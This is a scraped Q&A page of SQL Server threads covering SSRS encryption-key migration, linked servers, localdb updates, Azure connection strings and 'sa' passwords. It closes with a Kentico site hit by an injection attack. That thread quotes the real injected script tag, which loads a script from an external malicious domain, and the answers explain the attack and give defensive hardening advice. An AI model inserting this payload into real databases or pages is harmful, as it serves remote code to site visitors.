I have been experiencing random connection/handshake problems w/ a hyper server VM running SQL and SSRS
So the network guys suggested building a new VM and trying it there. (Have you tried rebooting? )
I asked that they rename the old server (--> SQLBKUP) and name the new server to the current name (--> SQL) so all my connection strings will continue to work.
Regardless the wisdom of that approach, that is all now done.
All of our applications work. (and the weird handshake issue is gone,joy)
I have reinstalled SSRS and I thought I was home free.
We backed up and restored the ReportServer and ReportServerTemp databases to the new server.
If i try to point to these databases , I keep getting this error
The report server installation is not initialized. (rsReportServerNotActivated) Get Online Help
Any all information I can find about this for 2012 says that the initialization happens automatically when you configure a database.
I tried creating a new database, and presto, everything works fine.
I reconfigured SSRS to point at the old database and I again get the rsReportServerNotActivated error.
I also 'powered down' SQLBKUP in case it was causing some confusion, I cant imagine what that might be, but why not... This did NOT correct the problem.
Any ideas on why the databases that were working on 1 server wont work on the new one?
Searching the interweb for this issue I find two results for 2012 SSRS (many hits for 2005 issues/resolutions )
this article details how the RSExec role should be configured, I have verified that is all correct.
https://msdn.microsoft.com/en-us/library/cc281308.aspx
this article details the mechanics of various ways to move a database. The back up and restore operations went off w/o a hitch.
https://msdn.microsoft.com/en-us/library/ms156421.aspx
neither article mentions cleaning up any server names, ip addresses, etc. that might be in a config table. Inspecting the tables in SSMS, I dont see any tables that look like they might need such attention.
I can always recreate the environment, I am aout to that point, at least I will know what I have in front of me. If anyone has any suggestions, i would appreciate it, Im sure I will be up for a while... :-)
tyia
greg
You are getting that error because you haven't moved the old encryption keys to the new server. SSRS uses encryption to secure credentials and connection information. You'll need to get the encryption keys from the old server and restore them to the new one OR if you don't have the keys anymore you can create new ones but you'll need to setup your connection information again.
First backup your old encryption keys:
Start the Reporting Services Configuration Manager, and
then connect to the report server instance you want to configure.
Click Encryption Keys, and then click Back Up.
Type a strong password.
Specify a file to contain the stored key. Reporting Services appends a
.snk file extension to the file. Consider storing the file on a disk
separate from the report server.
Click OK.
Then restore the keys to the new server:
Start the Reporting Services Configuration Manager, and then connect to the report server instance you want to configure.
On the Encryption Keys page, click Restore.
Select the .snk file that contains the back up copy.
Type the password that unlocks the file.
Click OK.
You can also use the rskeymgmt utility, see the MSDN article: Back Up and Restore Reporting Services Encryption Keys.
If you don't have access to the older server you'll need to delete and recreate the encryption keys. Once you delete the keys the server will automatically re-initialize itself and you'll need to re-enter all of the lost encrypted information.
The following things will occur when you delete the encryption keys:
Connection strings in shared data sources are deleted. Users who run reports get the error "The ConnectionString property has not
been initialized." Stored credentials are deleted. Reports and
shared data sources are reconfigured to use prompted credentials.
Reports that are based on models (and require shared data sources configured with stored or no credentials) will not run.
Subscriptions are deactivated.
Steps to delete the keys:
Start the Reporting Services Configuration tool, and then connect to
the report server instance you want to configure.
Click Encryption Keys, and then click Delete. Click OK.
Restart the Report Server Windows service. For a scale-out
deployment, do this on all report server instances.
This is from MSDN - Delete and Re-create Encryption Keys. The article has a lot more useful information.
For more information also read Configure and Manage Encryption Keys
Related
For many years we've had a reporting database that we have written our SSRS reports out of, which includes some linked servers. The linked servers are set up on the SQL instance where reporting services lives, as well as the main databases we use to report out of. We've decide to split off reporting service from the main server, and give it its own house.
I've setup SQL 2014 along with reporting services, and published my reports over there instead. All of the 'non-linked' reports work fine. However all the reports that reference a linked server (that used to work on the main server) now fail with the following error in the log file:
Access to the remote server is denied because the current security context is not trusted.
I thought maybe I needed to set up the linked servers on the new RS SQL server to get this to work. I had assumed that it would pass the entire query (including the linked part) over to the data source specified and my primary server would run it and return the data. Nevertheless, I set up the exact same linked servers on the new reporting services box... but still receive the same error.
All these reports worked just fine on the original server, however they all seem to be having issues on the new server no matter what linked server they are connecting to.
I am at a loss, and would love any ideas you guys may have.
Server A:
Main Data Source. This server contains the majority of our data and also housed our Reporting Services. This server has links to several other SQL servers that I was able to openquery to, and join the data to our main data source. We have many published reports that utilize the linked servers and have historically provided no issues.
Server B:
New SSRS box. This new server was set up in an attempt to off-load all of our reporting needs to another box thereby freeing up any resources required to run reports and SSIS packages. I took all of our existing reports and published them to the new server as-is. Initially I didn't think I would need to recreate the linked servers on this box, since those requests would be going to my main data source (Server A). I've tried both with, and without the linked servers existing on Server B, but get the same results. When the linked servers DID exist on Server B, I was able to query them directly with no errors. The services on Server B are running under the same credentials as those on Server A.
Well, I did some more digging and found my resolution. So the data sources have always been using the end users credentials to run the reports. On the old server, the linked servers use a hard coded SQL account to make the connection. This works fine so long as it is all on one server. However, when running from a secondary server it appears that this scenario will not work. Instead, I found that if I make the data source use the 'same' hard coded SQL account and the linked server to make the connection to Server A, the linked servers work fine.
I am trying to find the best procedure to get data from our SQL server at headquarters to update apps running on local machines in various locations not connected to our network. Our current data and application is in Foxpro where you simply copied the data file, so I am not very familiar with using SQL databases.
The field app uses localdb and users don't save anything to the database. When the app opens it checks a web site to for updates. I tried detaching our HQ .mdf and .ldf, downloading it and overwriting it on the local machine, but localdb would not attach to the new file (same name). I thought localdb closes and detaches when the application closes , but maybe I am wrong. I also wonder if I need the log file since no changes are made and I dont need to rollback anything. I have searched for a good article on this topic but haven't found anything. This must be a fairly common scenario in many companies.
You want to look into using replication, probably snapshot replication. This allows you to distribute on whatever schedule is applicable to send one or more tables, or other objects, to off site sql server instances. You can use Http to send data.
Not sure where to start, but whenever I publish my ASP.NET website to Azure, any pages which have database access give me a message saying "Error. An Error occurred while processing your request." I open up the remote debugger (which is fickle because it refuses to attach half of the time) and I see the error occurs when establishing when trying to access Entity Framework. The error varies between a "network-related or instance-specific" error, or a "Login Failed" error (which could be the result of the previous error, I really don't know).
The ADO.NET connection string SQL Azure gives is
Server=tcp:[servername].database.windows.net,1433;Database=EnsembleMusicWebDatabase;User ID=user#[servername];Password=(password);Trusted_Connection=False;Connection Timeout=30;
But every implementation (inserting that into EF metadata string, changing the server to data source...etc) still gives me the same login error
I'm pretty sure it's a problem with the connection string, but the infuriating part is that I've tried every possible combination I can think of (entity framework metadata, using the SQL Azure database ADO.NET connection strings in any possible way, changing the Azure website connection strings under the Config tab, using just a plain connection string...etc).
I've deleted and rebuilt the Entity Framework models at least 5 times, and every time I can successfully establish a connection to the server and it successfully reads my database and creates the correct models. I deploy the application to localhost and it works. The problem is when I publish, it cannot access the database and keeps giving me these login failed errors (the login details are the exact same as when I set up the EF model).
I think it might be something to do with the firewall, since I can access the DB locally with an approved firewall IP on the server config, but the website itself can't access the database (I have the enable azure services box ticked as well). I'm really at a loss for what to do now, because I just want the site (not any user, just the application) to fetch some data from the database and display it on the page, but I don't understand how this could be so complicated.
Can anyone point me in the right direction? I tried every tutorial and example on msdn and I can't find any solutions on SO that work.
Thanks,
Shaun
I realised that I somehow got into a complete mess with connection strings all over the place and the best way to fix it was just to start again. I deleted my Azure website and database instances, built the database first (created a correct login as well) and then when creating a new website Azure gave me the option to include the database I had just created. I now have a correct connection string that Azure generated, but to be safe (because the metadata made connection strings confusing and I didn't want to risk having this same issue again) I'm not using Entity Framework and just using normal SqlClient queries, since the website only requests two objects from a database.
I think now I've got a correct and working string I can look at it and really understand where I went wrong and how to avoid this if I do end up using Entity Framework.
I installed sql server 2005 Express in a virtual clean Windows xp machine.
On the database engine I created two instances, each one of these I have configured mixed authentication and the first user 'sa' password is 'password1' and the second 'password2'.
Then in the first instance, I have created a new database with a common table and a few details. Followed by this stopped the first instance I try to attach the database in the second instance. As it was to be expected, this caused an error and the process was aborted.
Then what I did was to change the password for the 'sa' user and I put the same one that was in the one instance ('passowrd1'). Now try to attach the database, the process is run correctly and the database created in the first instance was properly attached in the second instance.
Until here nothing weird, my surprise was given to make the next step.
In the second instance, I have again changed the password to the user 'sa' and this time put it as it was originally ('password2') and the attached database is kept running.
This is the first thing that I don't understand why it occurs in this way. And as last test, I stopped the second instance and start the first, and to my surprise the database also kept running.
Can someone tell me why this behavior is given as well?
My fear is to create a database with a password 'X' and then for some reason someone discover the password and then changing it, if someone attached database in another instance, can use the old password to open it. The same behavior is happening at others editions of sql server?
Are there any security layer extra that recommend me to apply?
The SA password should have no effect on any user-created databases. It only would affect system databases (Master, Model, MSDB, TempDb). Unless, of course, you encrypted your database files or if you are doing a password-secured backup/restore (which, you are not).
When you were unable to attach the first time, I would suspect that the first SQL instance had not finished shutting down yet. It was merely a coincidence that you took a few minutes to change passwords and then were able to attach the original DB file.
If you want to secure your databases, so they are not stolen and attached to another database, I would recommend doing this at the Server OS level. Prevent people from getting to the file in the first place.
My site is created in Kentico CMS 5.5 and SQL server 2008. Its running successfully but now these days any one of hacker hack my site and after a long time i found that in many of tables hacker add
></title><script src="http://lilupophilupop.com/sl.php"></script><!--
line in before of ever varchar cell. Suppose i have user table in that case before username it adds this string, before user's email-ID it adds this same string. How i can prevent my sql server by using this hacking. And what is the reason behind this?
How i can prevent my sql server by using this hacking.
First, you need to find out how the hacker got the data into your database (SQL injection, weak account password, ...). Then you can take appropriate actions.
And what is the reason behind this?
The hacker hopes that the varchar field is printed on a web page without being properly encoded first. If that happens, the user's browser will download and execute the script.
This looks like it could be an 'SQL Injection' attack probably aimed at sending your visitors to a malware of fraudlent site.
Unfortunatly as Kentico CMS is commercial software your options are limited. You won't have the source that you can tweak to prevent further attacks commint through the front end.
You may need to
Review the security of your SQL server and ensure that the attacker didn't connect to it directly
Update to the latest security patch for the CMS (if you pay for maintenance it's free)
Get support from Kentico, they may have seen this before
Clean up your data and remove the offending scripts
If none of that is sucessful you may be able to add triggers to the necessary tables in SQL to remove the scripts as they are inserted in the database.
You need to follow the industry best practices : look at
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
For the top 10 Web application security risks.
There are few things to keep in mind that save your database from hacking is given below:
Always use parametrized Sql, pass all values to DB using parametrized query
SqlCommand cmd = new SqlCommand("SELECT * FROM TableName WHERE ID = #ID");
Not
SqlCommand cmd = new SqlCommand("SELECT * FROM TableName WHERE ID = " + value + "");
Similarly, use INSERT, UPDATE, and DELETE query, or use STORED PROCEDURE in same manner.
Only set permission to your specific user
You can on/off ValidateRequest in your page/web.config file as required.
Set Validation both in client/server side so that only valid data will pass to DB
User appropriate data type in your column other than using a common data type (say VARCHAR)
Thanks
I agree with #Heinzi - you should make an effort to figure out the attack vector (how the baddie got into your application). You've found text in your database, but how did it get there? Directly via Sql Server or through the web server OR through Kentico? As you go through this investigative process, make notes of where your security is weak, and firm it up as you go - you're essentially doing a security audit! Doing these steps will lead you to harden your servers against most sort of attacks, hopefully preventing this sort of thing from happening to you again.
I don't know anything about your topology (how your servers are set up and connected to each other and the web), but we can make a start at investigating by looking into the windows log of the machine your sql server is installed on - look for logins happening at times that are questionable, look for odd user accounts, and examine your password and username security. Get more details of things to look into here:Windows Intruder Detection Checklist
If that doesn't turn up anything, look at the Sql server logs, and review your username/password security AND the access to the sql server instance; eg: the sql server should only be accessible from machines that have an explicit reason - your web server, maybe a network admin box, etc - use Windows Firewall to make the access 'tight', so that the sql server instance doesn't just respond to any computer asking. - Here's more details about how to secure sql server.
Check the web.config on your webserver - is the sql server username and password there? Check your ftp logs to see if anyone's tried to read it recently.
Kentico versions 5+ (and maybe earlier) come with the ability to log 'events'. If you have event logging turned on, you should be able to see your templates being modified; go to Site Manager > Administration > Event Log and go back to the date when you first noticed it, and examine the entries for what user account was doing the modifications.
Or even better: if you have access to the db server, you can do a direct table query to get at this data:
SELECT TOP 1000 *
FROM [CMS_EventLog] Look again for entries that seem to happen at odd times from weird Ip addresses or usernames.
And again, it's better to restrict access to all 'sensitive' resources (the Database, Kentico cmsdesk and siteadmin) as best you can. Windows Firewall is pretty great at doing this - tighten down Remote Desktop access, and close as many ports as you can to reduce your servers' exposed surface area. Test your exposure using something as simple as Shields Up! from Gibson Research or the Awesome Nmap security scanner tool.
As an example, my web servers only publicly expose ports 80 and 443 (http and https), and maybe a random high port like 4456 for Ftp if it's needed. I use Windows Firewall to restrict access to Remote Desktop to a handful of IP addresses. The Sql servers have NO public ports, they are tuned to 'stealth' and not reply to any request from a non-authorized IP.
As an anecdotal example - when I put a server live, it has taken as little as 8 hours before bots start trying to log in via remote desktop (you can see thousands of failed attempts in the windows Event Log > security) - as soon as you use windows firewall to ignore non-approved IP addresses, the log stays clear.
As a helpful note: if you are not experienced doing this sort of thing, you may want to procure the services of an experienced Windows system administrator to help you. And please realize that there may be more compromised systems - you may have just found the 'tip of the iceberg', there could be Trojans and Rootkits and other nasties waiting, so you'll need a full security scan too.